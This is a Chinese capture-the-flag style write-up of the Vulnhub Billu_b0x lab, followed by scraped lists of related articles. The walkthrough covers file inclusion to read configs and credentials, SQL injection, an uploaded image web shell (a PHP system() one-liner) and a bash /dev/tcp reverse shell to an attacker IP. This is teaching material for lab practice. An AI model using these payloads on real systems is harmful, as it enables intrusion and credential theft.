运行虚拟机直接上nmap扫描 获取靶场ip

nmap 192.168.18.*

开放端口

TCP 22 SSH OpenSSH 5.9p1
TCP 80 HTTP Apache httpd 2.2.22

192.168.18.143  打开页面 爆破路径 得到

test.php、add.php、in.php、c.php、index.php、show.php等 猜测c.php 可以有一句话 在爆破一句话

一次打开 发现 test.php

要一个file 猜测可能是文件包含   输入

成功下载文件 

in.php 是phpinfo 文件

ctril+f  搜索 SCRIPT_FILENAME   得到跟路径

把刚刚暴露的文件依次下载发现 c.php 里面有连接mysql 的账号密码 在phpmyadmin 下可能存在默认配置文件

用户名:billu密码:b0x_billu数据库名:ica_lab登录

在尝试读取phpmyadmin的默认配置文件  file=/var/www/phpmy/config.inc.php  得到mysql root 的账号密码

root密码:roottoor  既然已经获取了 他的22端口开着可以尝试登录

登录成功 root权限

这里我也可以看到原先主页的sql 注入 提示  下载源码

对单引号做了转义  这样我想起来 一个ctf 题 也是对单引号进行转义   直接利用 在单引号前面加个反斜杠对反斜杠进行转义构建slq注入语句

成功注入登录成功

进去查看页面发现 panel.php  利用任意下载漏洞 下载 在前面源码中也有包含 panel.php 文件的代码

代码审计发现 文件包含 上传一张图片马让后包含

利用之前扫描出来的路径查看  /uploaded_images/

让后直接包含

这里 可以在  马里写一个get 请求反弹shell

cmd=echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash  cmd 后门的命令需要url 编码

<?php system($_GET['cmd']); ?> 利用 system 函数执行系统命令
这里也可以利用菜刀或者蚁剑连接 打开蚁剑

连接

打开虚拟终端输入 u'na'me -a   ‘不影响命令读取

(www-data:/var/www) $ u'na'me -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
可以利用linux 内核提权
https://www.exploit-db.com/exploits/37292

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

差不多两种提权思路

转载于:https://www.cnblogs.com/feizianquan/p/11147355.html

Vulnhub靶场渗透练习(二) Billu_b0x相关推荐

  1. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  2. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

  3. Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)

    Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权) 靶机地址:https://www.five86.com/dc-2.html 下载靶机将其导入到VMware,然后设置网络模式为N ...

  4. Vulnhub靶场渗透-CH4INRULZ_v1.0.1

    前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3 ...

  5. CTF综合靶场渗透系列-Billu_b0x

    Billu_b0x 文章目录 Billu_b0x 前言 目标 运行环境 信息收集 漏洞挖掘 测试首页SQL注入 利用文件包含漏洞获取php源码.passwd文件 通过得到的mysql密码登录phpmy ...

  6. 【甄选靶场】Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目二十四:MINU-1(WAF绕过,JWT爆破) 靶场地址

  7. 【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出) 靶场地址

  8. 【甄选靶场】Vulnhub百个项目渗透——项目二十一HACKLAB_VULNIX(NFS挂载,ssh毒化)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目二十一:HACKLAB_VULNIX(NFS挂载,ssh毒化) 靶场地址

  9. vulnhub靶场——BREACH: 1 渗透记录

    BREACH: 1 vulnhub靶场--BREACH: 1 渗透记录 BREACH: 1 一.信息搜集 二.网站渗透 1.流量包 2.tomcat 三.提权 反弹root的shell BREACH: ...

最新文章

  1. bzoj 3120 矩阵优化DP
  2. Eclipse键盘控
  3. boost::spirit::karma::detail::format_manip相关的测试程序
  4. 20145237 《信息安全系统设计基础》第2周学习总结
  5. 算法分析设计--递归算法
  6. 激怒开源社区,微软悄悄删除2500行功能代码后致歉:已恢复!
  7. 为什么函数lamda显示权限不足_一个简单的Vue按钮级权限方案
  8. 开源操作系统 OpenBSD 被曝四个严重的认证绕过和提权漏洞(详情)
  9. 2014蓝桥杯:李白打酒;奇怪的分式(枚举,最大公约数)
  10. java 集合工具类_Java集合中Collections工具类总结
  11. #pragma warning(disable 4786)
  12. 以潘金莲和西门公子为例讲述Java静态代理和动态代理
  13. js 汉字转换成拼音
  14. warning: pointer targets in passing argument 3 of ‘accept’ differ in signedness
  15. 一文读懂隐私公链Findora生态布局
  16. Ubuntu16.04开机后黑屏无法进入系统登陆界面
  17. 蓝桥杯_既约分数_java
  18. linux下区分各种SCSI磁盘类型
  19. 2016电商重大并购名单:未来并购会更频繁
  20. 在万彩手影大师上怎么制作微课_万彩手影大师下载-万彩手影大师下载v2.4.0 官方版-西西软件下载...

热门文章

  1. HDU 2037 今年暑假不AC (贪心)
  2. SmartTimer的开发思路
  3. struts2 - ation 访问 Servlet api
  4. SQL的四种连接-左外连接、右外连接、内连接、全连接(转)
  5. Flutter ClipOval 圆形裁剪实现的图形图片
  6. Android ListView 疯狂之旅 之 《自定义下拉刷新功能的ListView》
  7. [bzoj1008] [HNOI2008]越狱
  8. 【Linuxamp;Unix--open/close/write/read系统调用】
  9. 问题2 String类equals 和 “==” 比较
  10. file标签样式修改